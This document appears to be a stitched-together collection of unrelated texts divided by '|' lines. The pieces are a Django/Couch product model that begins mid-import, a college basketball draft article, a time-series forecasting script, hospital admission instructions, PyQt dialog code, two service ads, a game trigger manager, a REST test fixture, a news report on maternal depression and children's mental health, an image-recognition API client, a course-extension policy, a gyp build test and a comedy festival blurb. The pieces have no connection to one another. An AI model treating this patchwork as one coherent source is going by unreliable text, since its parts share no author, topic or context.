DecimalProperty,
DictProperty,
BooleanProperty,
DateTimeProperty,
)
from dimagi.utils.couch.database import iter_docs
# move these too
from corehq.apps.commtrack.exceptions import InvalidProductException, DuplicateProductCodeException
class Product(Document):
"""
A product, e.g. "coartem" or "tylenol"
"""
domain = StringProperty()
name = StringProperty()
unit = StringProperty()
code_ = StringProperty() # todo: why the hell is this code_ and not code
description = StringProperty()
category = StringProperty()
program_id = StringProperty()
cost = DecimalProperty()
product_data = DictProperty()
is_archived = BooleanProperty(default=False)
last_modified = DateTimeProperty()
@classmethod
def wrap(cls, data):
from corehq.apps.groups.models import dt_no_Z_re
# If "Z" is missing because of the Aug 2014 migration, then add it.
# cf. Group class
last_modified = data.get('last_modified')
if last_modified and dt_no_Z_re.match(last_modified):
data['last_modified'] += 'Z'
return super(Product, cls).wrap(data)
@classmethod
def save_docs(cls, docs, use_uuids=True, all_or_nothing=False, codes_by_domain=None):
from corehq.apps.commtrack.util import generate_code
codes_by_domain = codes_by_domain or {}
def get_codes(domain):
if domain not in codes_by_domain:
codes_by_domain[domain] = SQLProduct.objects.filter(domain=domain)\
.values_list('code', flat=True).distinct()
return codes_by_domain[domain]
for doc in docs:
doc.last_modified = datetime.utcnow()
if not doc['code_']:
doc['code_'] = generate_code(
doc['name'],
get_codes(doc['domain'])
)
super(Product, cls).save_docs(docs, use_uuids, all_or_nothing)
bulk_save = save_docs
def sync_to_sql(self):
properties_to_sync = [
('product_id', '_id'),
'domain',
'name',
'is_archived',
('code', 'code_'),
'description',
'category',
'program_id',
'cost',
('units', 'unit'),
'product_data',
]
# sync properties to SQL version
sql_product, _ = SQLProduct.objects.get_or_create(
product_id=self._id
)
for prop in properties_to_sync:
if isinstance(prop, tuple):
sql_prop, couch_prop = prop
else:
sql_prop = couch_prop = prop
if hasattr(self, couch_prop):
setattr(sql_product, sql_prop, getattr(self, couch_prop))
sql_product.save()
def save(self, *args, **kwargs):
"""
Saving a couch version of Product will trigger
one way syncing to the SQLProduct version of this
product.
"""
# mark modified time stamp for selective syncing
self.last_modified = datetime.utcnow()
# generate code if user didn't specify one
if not self.code:
from corehq.apps.commtrack.util import generate_code
self.code = generate_code(
self.name,
SQLProduct.objects
.filter(domain=self.domain)
.values_list('code', flat=True)
.distinct()
)
result = super(Product, self).save(*args, **kwargs)
self.sync_to_sql()
return result
@property
def code(self):
return self.code_
@code.setter
def code(self, val):
self.code_ = val.lower() if val else None
@classmethod
def get_by_code(cls, domain, code):
if not code:
return None
try:
sql_product = SQLProduct.objects.get(domain=domain, code__iexact=code)
except SQLProduct.DoesNotExist:
return None
else:
return cls.get(sql_product.product_id)
@classmethod
def by_domain(cls, domain, wrap=True, include_archived=False):
queryset = SQLProduct.objects.filter(domain=domain)
if not include_archived:
queryset = queryset.filter(is_archived=False)
return list(queryset.couch_products(wrapped=wrap))
@classmethod
def ids_by_domain(cls, domain):
return list(SQLProduct.objects.filter(domain=domain).product_ids())
@classmethod
def count_by_domain(cls, domain):
"""
Gets count of products in a domain
"""
# todo: we should add a reduce so we can get this out of couch
return len(cls.ids_by_domain(domain))
@classmethod
def _export_attrs(cls):
return [
('name', unicode),
('unit', unicode),
'description',
'category',
('program_id', str),
('cost', lambda a: Decimal(a) if a else None),
]
def to_dict(self):
from corehq.apps.commtrack.util import encode_if_needed
product_dict = {}
product_dict['id'] = self._id
product_dict['product_id'] = self.code_
for attr in self._export_attrs():
real_attr = attr[0] if isinstance(attr, tuple) else attr
product_dict[real_attr] = encode_if_needed(
getattr(self, real_attr)
)
return product_dict
def custom_property_dict(self):
from corehq.apps.commtrack.util import encode_if_needed
property_dict = {}
for prop, val in self.product_data.iteritems():
property_dict['data: ' + prop] = encode_if_needed(val)
return property_dict
def archive(self):
"""
Mark a product as archived. This will cause it (and its data)
to not show up in default Couch and SQL views.
"""
self.is_archived = True
self.save()
def unarchive(self):
"""
Unarchive a product, causing it (and its data) to show
up in Couch and SQL views again.
"""
if self.code:
if SQLProduct.objects.filter(domain=self.domain, code=self.code, is_archived=False).exists():
raise DuplicateProductCodeException()
self.is_archived = False
self.save()
@classmethod
def from_excel(cls, row, custom_data_validator):
if not row:
return None
id = row.get('id')
if id:
try:
p = cls.get(id)
except ResourceNotFound:
raise InvalidProductException(
_("Product with ID '{product_id}' could not be found!").format(product_id=id)
)
else:
p = cls()
p.code = str(row.get('product_id') or '')
for attr in cls._export_attrs():
key = attr[0] if isinstance(attr, tuple) else attr
if key in row:
val = row[key]
if val is None:
val = ''
if isinstance(attr, tuple):
val = attr[1](val)
setattr(p, key, val)
else:
break
if not p.code:
raise InvalidProductException(_('Product ID is a required field and cannot be blank!'))
if not p.name:
raise InvalidProductException(_('Product name is a required field and cannot be blank!'))
custom_data = row.get('data', {})
error = custom_data_validator(custom_data)
if error:
raise InvalidProductException(error)
p.product_data = custom_data
p.product_data.update(row.get('uncategorized_data', {}))
return p
class ProductQueriesMixin(object):
def product_ids(self):
return self.values_list('product_id', flat=True)
def couch_products(self, wrapped=True):
"""
Returns the couch products corresponding to this queryset.
"""
ids = self.product_ids()
products = iter_docs(Product.get_db(), ids)
if wrapped:
return itertools.imap(Product.wrap, products)
return products
class ProductQuerySet(ProductQueriesMixin, models.query.QuerySet):
pass
class ProductManager(ProductQueriesMixin, models.Manager):
def get_queryset(self):
return ProductQuerySet(self.model, using=self._db)
class OnlyActiveProductManager(ProductManager):
def get_queryset(self):
return super(OnlyActiveProductManager, self).get_queryset().filter(is_archived=False)
class SQLProduct(models.Model):
"""
A SQL based clone of couch Products.
This is used to efficiently filter StockState and other
SQL based queries to exclude data for archived products.
"""
domain = models.CharField(max_length=255, db_index=True)
product_id = models.CharField(max_length=100, db_index=True, unique=True)
name = models.CharField(max_length=100, null=True)
is_archived = models.BooleanField(default=False)
code = models.CharField(max_length=100, default='', null=True)
description = models.TextField(null=True, default='')
category = models.CharField(max_length=100, null=True, default='')
program_id = models.CharField(max_length=100, null=True, default='')
cost = models.DecimalField(max_digits=20, decimal_places=5, null=True)
units = models.CharField(max_length=100, null=True, default='')
product_data = jsonfield.JSONField(
default=dict,
)
created_at = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
objects = ProductManager()
active_objects = OnlyActiveProductManager()
def __unicode__(self):
return u"{} ({})".format(self.name, self.domain)
def __repr__(self):
return "<SQLProduct(domain=%s, name=%s)>" % (
self.domain,
self.name
)
@classmethod
def by_domain(cls, domain):
return cls.objects.filter(domain=domain).all()
@property
def get_id(self):
return self.product_id
class Meta:
app_label = 'products'
|
The wait for Bobby Brown is over; well sort of. The former Cal-State Fullerton guard recently received his invitation to the NBAs pre-draft camp in Orlando, where hell have the opportunity to show his stuff against other top college players from around the country in front of an audience of NBA scouts. While Brown had a poor showing in Orlando last year, he figures to have a leg up on a lot of the competition this year with his experience in the workings of the camp.
In preparation for his business trip Brown has been working with former UCLA great Don MacLean, who spent nine seasons in the NBA. Brown says that he has already gained a lot from his time with MacLean.
Training days for Brown begin at 8:30, when he wakes up and eats breakfast before hitting the court at 10. Warm-ups consist of ball-handling drills and full court passing drills, after which follows shooting drills. Its been a month since we talked to Brown, but the specific focuses of his training have not changed in that time.
Conditioning has also been a major part of Browns training. He stated that he has been participating in a lot of 1-on-1 and 2-on-2 full court drills to increase his endurance, which will be key when jumping to an 82 game season in the NBA after never playing more than 35 games at the college level.
Since he began individual training when Cal-State Fullertons season ended several weeks ago, Brown states he has noticed a definite difference between the types of coaching he received while still in school as opposed to his training now.
According to reports, the individual work has been paying off. Brown recently scrimmaged with several other college players and a handful of NBA players at the Home Depot Center in Carson, California, and put on quite a performance. When asked about his strong showing, Brown remained rather modest, choosing to focus on the fun of just playing the sport he loves.
One of the NBA players running against Brown at the Home Depot Center was Danny Granger of the Indiana Pacers, who has turned into a great contact for Brown as he works towards the pro level himself.
While Brown has been hard at work preparing for draft day, he has been able to enjoy the fact that he has completed his academic career.
In the stay of traditional school work, Brown has been in the process of arranging workouts with NBA teams. At the present time he said that he has definite dates with only a couple of franchises, but that he has already confirmed with seven teams that he will be working out for them. Brown will be hoping for strong performances at both the private workouts as well as the pre-draft camp to help his stock as much as possible. Currently though, Brown states he has almost no clue where he is going to land come draft day.
|
import pandas as pd
import numpy as np
import pyaf.ForecastEngine as autof
import pyaf.Bench.TS_datasets as tsds
import pyaf.CodeGen.TS_CodeGenerator as tscodegen
b1 = tsds.load_airline_passengers()
df = b1.mPastData
df.head()
H = b1.mHorizon;
N = df.shape[0];
for n in range(2*H, N , 10):
df1 = df.head(n).copy();
lEngine = autof.cForecastEngine()
lEngine
lEngine.mOptions.mEnableARModels = False;
# lEngine.mOptions.mDebugCycles = False;
lEngine.train(df1 , b1.mTimeVar , b1.mSignalVar, H);
lEngine.getModelInfo();
lEngine.mSignalDecomposition.mBestModel.mTimeInfo.mResolution
dfapp_in = df1.copy();
dfapp_in.tail()
# H = 12
dfapp_out = lEngine.forecast(dfapp_in, H);
dfapp_out.tail(2 * H)
print("Forecast Columns " , dfapp_out.columns);
lForecastColumnName = b1.mSignalVar + '_Forecast'
Forecast_DF = dfapp_out;
# [[b1.mTimeVar , b1.mSignalVar, lForecastColumnName , lForecastColumnName + '_Lower_Bound', lForecastColumnName + '_Upper_Bound' ]]
print(Forecast_DF.info())
# print("Forecasts_HEAD\n" , Forecast_DF.head(2*H).values);
# print("Forecasts_TAIL\n" , Forecast_DF.tail(2*H).values);
lCodeGenerator = tscodegen.cTimeSeriesCodeGenerator();
lSQL = lCodeGenerator.testGeneration(lEngine);
|
At the Jesenice General Hospital, we are aware that hospital admission can be difficult and that you may be worried about all of the instructions. We will try to do our best to make the process as easy as possible. We would like to ensure that you are satisfied with your stay, and with our care and work.
You have been admitted to our hospital due to health problems; your admission may be scheduled or unplanned.
In the case of a scheduled admission, a nurse will coordinate the date with you and will provide all of the necessary information. On the admission day, you should present yourself at the particular clinic at the agreed time and the nurse will ensure quick and smooth admission. On admission, you will receive an identification bracelet, which should be worn for your safety until the end of your stay at our hospital. After completing the admission procedure, the nurse will take you to the ward, introduce you to the patients in your room and show you the rooms that you will use during your stay in the ward.
Please follow the instructions given either on admission or during hospitalisation.
What do you require for admission?
a personal document, convention (for foreigners).
Please also bring your personal hygiene kit, a dressing gown (if you wish), slippers, glasses, hearing and orthopaedic aids, as well as any medicines that you take.
reports on other important tests or examinations.
Please also bring your personal hygiene kit, sanitary towels, glasses, a dressing gown (if you wish), etc. The maternity ward will provide hospital linen as well as clothing and care of the newborn. If you wish, you can wear your own clothes during labour and throughout your stay at the postpartum department.
Preparing a child or adolescent for admission to hospital is very important, as preparation plays a crucial role in how he or she will accept both hospitalisation and treatment. Preparing your child or adolescent prior to admission is therefore of great importance. At home, please explain to your child or adolescent the purpose of their admission to hospital, how long they will stay and when you will be able to visit them.
For children under the age of six, one parent or a legal guardian is allowed to stay with the patient free of charge. The type of accommodation (regular bed or emergency bed) depends on spatial constraints. We recommend that the child brings a toy or a favourite object. This will help to make the experience of staying in hospital easier.
There is a hospital school within the ward. It is run by two teachers, who make sure that, after discharge, the child or adolescent can return to school without major problems.
In our Day Hospital, you will be treated after examination by and consultation with a surgeon or orthopaedic surgeon at our clinic.
The case manager will call you 7–14 days prior to the scheduled procedure (please check the phone number that you left at our clinic), and you will be given the exact admission date and time.
The case manager will check that you have received all of the necessary documentation (admission instructions, instructions for your general practitioner, explanation of anaesthesia, informed consent/refusal of medical care). If this is not the case, the documents will be sent to you later. Prior to admission, the case manager will also help you to complete all activities necessary for the performance of the surgery.
You will be admitted to the Day Hospital on the day of surgery between 7.00 and 7.30 a.m. Admission will be carried out by the case manager, who will check the documentation for the surgery together with you. The case manager will inform you about the course of your placement in the ward, the activities during your stay at the hospital, and about pain management after the surgery and at home.
In the afternoon, you will start preparing for discharge in the presence of a doctor. A nurse will provide you with all of the necessary instructions and information that you will need in your home environment. You will have to be accompanied by a responsible adult, who will supervise you overnight, as well. You are not allowed to drive a car on your way home.
On the day after hospital discharge, the case manager will call you at home and check your health and well-being. This will also be an opportunity for you to ask any questions you may have.
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'boardOptions.ui'
#
# Created: Fri Oct 4 12:49:10 2013
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.setWindowModality(QtCore.Qt.WindowModal)
Dialog.resize(600, 400)
#Dialog.setMaximumSize(QtCore.QSize(400, 400))
self.buttonBox = QtGui.QDialogButtonBox(Dialog)
#self.buttonBox.setGeometry(QtCore.QRect(60, 260, 251, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.widget = QtGui.QWidget(Dialog)
#self.widget.setGeometry(QtCore.QRect(50, 30, 300, 300))
self.widget.setObjectName(_fromUtf8("widget"))
self.verticalLayout = QtGui.QVBoxLayout(self.widget)
#self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label = QtGui.QLabel(self.widget)
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout.addWidget(self.label)
self.comboBox = QtGui.QComboBox(self.widget)
self.comboBox.setObjectName(_fromUtf8("comboBox"))
self.horizontalLayout.addWidget(self.comboBox)
self.verticalLayout.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label_2 = QtGui.QLabel(self.widget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.horizontalLayout_2.addWidget(self.label_2)
self.comboBox_2 = QtGui.QComboBox(self.widget)
self.comboBox_2.setObjectName(_fromUtf8("comboBox_2"))
self.horizontalLayout_2.addWidget(self.comboBox_2)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.label_3 = QtGui.QLabel(self.widget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_3.addWidget(self.label_3)
self.comboBox_3 = QtGui.QComboBox(self.widget)
self.comboBox_3.setObjectName(_fromUtf8("comboBox_3"))
self.horizontalLayout_3.addWidget(self.comboBox_3)
self.verticalLayout.addLayout(self.horizontalLayout_3)
self.comboBox.setMinimumWidth(250)
self.comboBox_2.setMinimumWidth(250)
self.comboBox_3.setMinimumWidth(250)
self.retranslateUi(Dialog)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("accepted()")), Dialog.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("rejected()")), Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Dialog", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Dialog", "Balls", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Dialog", "Size", None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("Dialog", "Head", None, QtGui.QApplication.UnicodeUTF8))
|
CJ's Hood Cleaning is a commercial kitchen cleaning company that is value-oriented and completes every job with great attention to detail and care. We take great pride in being the preferred partner to clients in Paterson, NJ. We have a strong reputation for delivering high-quality services, and our kitchen equipment and hood cleaning service exceeds compliance requirements and safety standards. It is our goal to attain complete customer satisfaction. With more than seven years of industry experience, we are fully licensed and insured to handle every job you have for us! And if you are still not sure why you should hire us, below is a list that will help you understand who we are and why you should choose us instead of others.
Very professional and reliable! The cleaners are very thorough, and everything they clean is immaculate! I am more than pleased with the quality of their work and will continue to use their services!
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2015 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import trigger as tm
class Space(object):
def __init__(self):
pass
def monster_count(self):
return 0
class TriggerManager(object):
def __init__(self, space=None):
self.space = space
self.triggers = {}
self.activate_triggers = set()
def register(self, trigger_no, infos):
trigger_name = 'Trigger%d' % trigger_no
trigger_type = getattr(tm, trigger_name)
if trigger_type:
trigger = trigger_type(self.space, infos)
self.triggers[trigger_no] = trigger
if trigger.activatiable():
self.activate_triggers.add(trigger_no)
def unregister(self, trigger_no):
self.triggers.pop(trigger_no, None)
def on_event_notify(self, notify, *args):
completed_triggers = []
for trigger_no in self.activate_triggers:
trigger = self.triggers.get(trigger_no, None)
if not trigger:
continue
on_event = getattr(trigger, notify, None)
if on_event:
on_event(*args)
if trigger.is_completed():
completed_triggers.append(trigger_no)
[self.activate_triggers.discard(no) for no in completed_triggers]
if __name__ == '__main__':
space = Space()
trigger_mgr = TriggerManager(space)
trigger_mgr.register(1101, {'cond': 0, 'action': 'all monsters dead !!!'})
trigger_mgr.on_event_notify('on_monster_die')
|
Salesforce Consulting services, Integration, App Development, Project Management and Quality Control in various industries like Automotive, Health Care, Marketing, Insurance.
We specialize in advanced Salesforce Development utilizing iterative methods and version control. This is the key to timely results with minimal risks.
Complete End to End Development, Administration, Deployment & Live Salesforce Application Support For Your Org.
Rated 5.0 / 5.0 based on 237 ratings for Salesforce and custom development services across various IT niches.
Our clients get a stable in-house team of developers, skillful at implementing Salesforce solutions. On top of that, we have plenty of ready-made solutions, which will save your time and money.
Deadlines are set – they have to be met. On-time delivery is one of most appreciated advantages of working with us.
Once we agree on a price we will never change or extend it. You can always feel comfortable knowing the first project quote is final.
We always offer 1 year of maintenance and technical support after the project launches. We’ll fix any issues, even if it occurs post-delivery.
Hub Helping connect hospitals and suppliers to securely sell medical inventories.
Payne Auto Group Navigate auto insurance seamlessly in one, organized online hub.
|
from rest_framework.test import APITestCase
from restapi.models import WebRadio, AlarmClock
class Base(APITestCase):
def setUp(self):
super(Base, self).setUp()
self.test_webradio = WebRadio.objects.create(name="test", url="http://test.com")
self.test_webradio2 = WebRadio.objects.create(name="test2", url="http://test2.com")
self.test_alarm = AlarmClock.objects.create(name="alarm1",
monday=True,
hour=8,
minute=20,
webradio=self.test_webradio)
self.test_alarm2 = AlarmClock.objects.create(name="alarm2",
wednesday=True,
hour=8,
minute=20,
webradio=self.test_webradio2)
|
March 21, 2006 -- When parents' depression gets better, their kids' mental health improves. But when parents' depression doesn't lift, the kids' mental health gets worse.
The finding is part of the large STAR-D trial funded by the National Institutes of Mental Health. The study is trying to find out what it takes to put serious clinical depression into remission -- not just to improve symptoms, but also to get people over their illness.
Columbia University researcher Myrna M. Weissman, PhD, led a team that studied 151 depressed mothers enrolled in the STAR-D trial. The researchers also evaluated one of each woman's 7- to 17-year-old children. Their findings appear in the March 22/29 issue of The Journal of the American Medical Association.
"This offers dramatic evidence that children benefit from successful treatment of a parent's depression," Weissman tells WebMD.
The study has a dark side. When depression treatment didn't work -- or didn't reduce a mother's depressive symptoms by at least half -- children suffered worsening mental health.
In the STAR-D study, only a third of the mothers got fully better -- what doctors call remission -- within three months. Only half had a 50% reduction in symptoms, which is the minimal improvement found to help the depressed parent's children.
This means it's essential for a depressed parent to get immediate help and to stay with treatment until something works, says Eva Ritvo, MD. Ritvo is associate professor of psychiatry at the University of Miami's Miller School of Medicine and chief of psychiatry at Mount Sinai Medical Center in Miami Beach, Fla.
"Not only do children get well when the parent's depression gets better, but they get worse if the parent does not," Ritvo tells WebMD. "So a parent's depression should be treated early and aggressively and thoroughly. This tells us that depression is real, that treatment really helps, and that other family members are impacted by this disease and by its treatment."
Weissman's team found that at the beginning of the study, half the kids had a history of psychiatric disorders and a third was currently suffering mental health problems.
The mothers all started treatment with Celexa, an SSRI antidepressant (as did all STAR-D participants).
If the mothers' depression fully lifted, the children's mental health problems decreased by 11%. If the mothers did not fully respond to treatment, their child's psychiatric diagnoses increased by 8%.
For the children who already had a mental health problem, 33% fully recovered -- that is, they lost their psychiatric diagnoses -- if their mothers' depression fully lifted. If the mothers' symptoms did not fully improve, only 12% of the kids fully recovered.
Even more impressive was what happened to children who hadn't yet suffered mental health problems. If the mothers' depression fully lifted, all the kids remained mentally healthy. But among mothers who didn't fully improve, 17% of their children were later diagnosed with a psychiatric disorder.
This shows the powerful effect of a parent's depression on a child, says child and family psychiatrist Marilyn B. Benoit, MD, past president of the American Academy of Child and Adolescent Psychiatry and clinical associate professor at Georgetown University in Washington, D.C.
"What you have to consider is, this is affecting the children on a day-to-day basis," Benoit says. "How the parent greets them in the morning sets the tone for their day. And if you have an ill-tempered, angry, or isolated parent, that changes the dynamics of the interaction immediately."
These effects are passed from generation to generation.
"In a previous study, we showed that depression was transmitted across generations," Weissman says. "And if a parent and grandparent are depressed, rates of anxiety and depression in the grandchild are very high."
The good news is that successful depression treatment counteracts this effect.
"This is big. Think of a funnel and how the impact of treating parents broadens as you look at their children and grandchildren," Benoit says. "By changing the parents' symptoms and changing the parent-child dynamics from negative to positive, you have affected the trajectory for a whole generation. And over 30 years, I have seen the third generation come along. I have seen how changing the grandparents has made life better for their grandchildren."
Only a third of the mothers enrolled in the STAR-D trial fully responded to treatment in the first phase of the study. But the whole point of the study is to keep treating patients until something works.
"If you start with antidepressant treatment and don't get full recovery, the story is not over," STAR-D study co-leader Madhukar H. Trivedi, MD, tells WebMD. Trivedi is professor of psychiatry and director of the mood disorders research program at the University of Texas Southwestern Medical Center.
Weissman, Ritvo, and Benoit stress that it's important not to give up on depression treatment -- especially for a parent.
"Mothering is a heavy task, and you have to be well to do it," Ritvo says. "If mothers with depression don't get well, we physicians have to be more aggressive in finding a treatment that works because more than one person is suffering."
"This is the message: Depression is a treatable disorder," Weissman says. "There are many treatments. In this case, it was medication. Sometimes it is psychotherapy. As a parent, you must know that depression is not your fault. It is a medical illness -- and you have to get help. So get treated and get better because it will help you and help the family."
Weissman says that while her study focused on mothers, she is sure that a father's depression also affects his children.
"Fathers get depressed. And they deserve the same kind of aggressive treatment," she says. "Fathers' rates of depression are not as high as in mothers, but their treatment is important."
Benoit says in most families, mothers still have more interaction with children than fathers. This means that a mother's depression often will have a stronger effect than a father's depression.
"If the father is depressed, the mothers tend to serve as a buffer from the father's pathology," Benoit says. "So that is why I think the mothers have a more critical role to play."
Treating the child of a depressed parent can help the child. But it's not as effective as getting to the root of the problem.
"It is possible to help the child cope with the parent's depression. By working with the children, you help them to get the protective buffer they need," Benoit says. "But there is nothing quite as good as getting that depressed parent treated."
SOURCES: Weissman, M.M. The Journal of the American Medical Association, March 22/29, 2006; vol 295: pp 1389-1398. Myrna M. Weissman, PhD, professor of epidemiology and psychiatry and chief, division of clinical and genetic epidemiology, New York State Psychiatric Institute, New York; faculty member, School of Public Health and department of psychiatry, Columbia University, New York. Marilyn B. Benoit, MD, private practice psychiatry; past president, American Academy of Child and Adolescent Psychiatry; clinical associate professor, Georgetown University, Washington, D.C. Eva Ritvo, MD, associate professor of psychiatry, University of Miami Miller School of Medicine; chief of psychiatry, Mount Sinai Medical Center, Miami Beach, Fla.; co-author, The Concise Guide to Marital and Family Therapy. Madhukar H. Trivedi, MD, professor of psychiatry and director, mood disorders research program, University of Texas Southwestern Medical Center.
|
import urllib.request
import urllib.parse
import json
class Client(object):
API_HOME = "https://rekognition.com/func/api/"
def __init__(self, api_key, api_secret, name_space="demo_project", user_id="demo_user"):
self.api_key = api_key
self.api_secret = api_secret
self.name_space = name_space
self.user_id = user_id
def face_recognize(self, image_url, **kwargs):
parameters = self.__make_initial_parameters()
jobs = "face_recognize"
for op in kwargs:
if kwargs[op]:
jobs += ("_" + op)
parameters.update({"jobs": jobs, "base64": image_url})
return self.__request(parameters)
def __make_initial_parameters(self):
return {
"api_key": self.api_key,
"api_secret": self.api_secret,
"name_space": self.name_space,
"user_id": self.user_id
}
@classmethod
def __request(cls, parameters):
p = urllib.parse.urlencode(parameters)
p = p.encode("utf-8")
request = urllib.request.Request(cls.API_HOME, p)
response = urllib.request.urlopen(request)
content = response.read()
obj = json.loads(content.decode("utf-8"))
return obj
|
Explanation. Required for extension on course work past the day grades are due (one week after end of final exams or in Spring and Summer, three weeks after the last class meeting). Requires approval by instructor and Registrar. If you don't meet the extended deadline, you get the grade you earned to that point (usually an F). See policies on extensions and I grades in the Academic Guide. Warning: your graduation date may be changed if you get an extension past it. Extensions are usually limited to cases of hardship.
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tests things related to ARCHS.
"""
import TestGyp
import TestMac
import re
import subprocess
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
test.run_gyp('test-no-archs.gyp', chdir='archs')
test.build('test-no-archs.gyp', test.ALL, chdir='archs')
result_file = test.built_file_path('Test', chdir='archs')
test.must_exist(result_file)
if TestMac.Xcode.Version() >= '0500':
expected_type = ['x86_64']
else:
expected_type = ['i386']
TestMac.CheckFileType(test, result_file, expected_type)
test.run_gyp('test-valid-archs.gyp', chdir='archs')
test.build('test-valid-archs.gyp', test.ALL, chdir='archs')
result_file = test.built_file_path('Test', chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['x86_64'])
test.run_gyp('test-archs-x86_64.gyp', chdir='archs')
test.build('test-archs-x86_64.gyp', test.ALL, chdir='archs')
result_file = test.built_file_path('Test64', chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['x86_64'])
test.run_gyp('test-dependencies.gyp', chdir='archs')
test.build('test-dependencies.gyp', target=test.ALL, chdir='archs')
products = ['c_standalone', 'd_standalone']
for product in products:
result_file = test.built_file_path(
product, chdir='archs', type=test.STATIC_LIB)
test.must_exist(result_file)
if test.format != 'make':
# Build all targets except 'exe_32_64_no_sources' that does build
# but should not cause error when generating ninja files
targets = [
'static_32_64', 'shared_32_64', 'shared_32_64_bundle',
'module_32_64', 'module_32_64_bundle',
'exe_32_64', 'exe_32_64_bundle', 'precompiled_prefix_header_mm_32_64',
]
test.run_gyp('test-archs-multiarch.gyp', chdir='archs')
for target in targets:
test.build('test-archs-multiarch.gyp', target=target, chdir='archs')
result_file = test.built_file_path(
'static_32_64', chdir='archs', type=test.STATIC_LIB)
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
result_file = test.built_file_path(
'shared_32_64', chdir='archs', type=test.SHARED_LIB)
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
result_file = test.built_file_path('My Framework.framework/My Framework',
chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
# Check that symbol "_x" made it into both versions of the binary:
if not all(['D _x' in subprocess.check_output(
['nm', '-arch', arch, result_file]) for arch in ['i386', 'x86_64']]):
# This can only flakily fail, due to process ordering issues. If this
# does fail flakily, then something's broken, it's not the test at fault.
test.fail_test()
result_file = test.built_file_path(
'exe_32_64', chdir='archs', type=test.EXECUTABLE)
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
result_file = test.built_file_path('Test App.app/Contents/MacOS/Test App',
chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
|
Where would the South African comedy scene be without Kagiso Lediga? The filmmaker, actor and comedian behind some of the countrys most loved comedy shows and films will speak at Design Indaba Conference 2019.
This year has been one of profound loss for the South African entertainment industry. Earlier this year we lost bra Hugh Masekela, whose contribution to the countrys cultural landscape includes the Bantu Hour, a scripted comedy show hosted by Kagiso Lediga.
Its easy to look at the South African entertainment industry today and forget that back in the 90s, it was not common to see black people doing sketch shows on television. But this was the moment that Lediga introduced the country to the Pure Monate Show (PMS), a comedy sketch show that would go on to be a launching pad for some of the countrys top comedians including Loyiso Gola, Trevor Noah and many more.
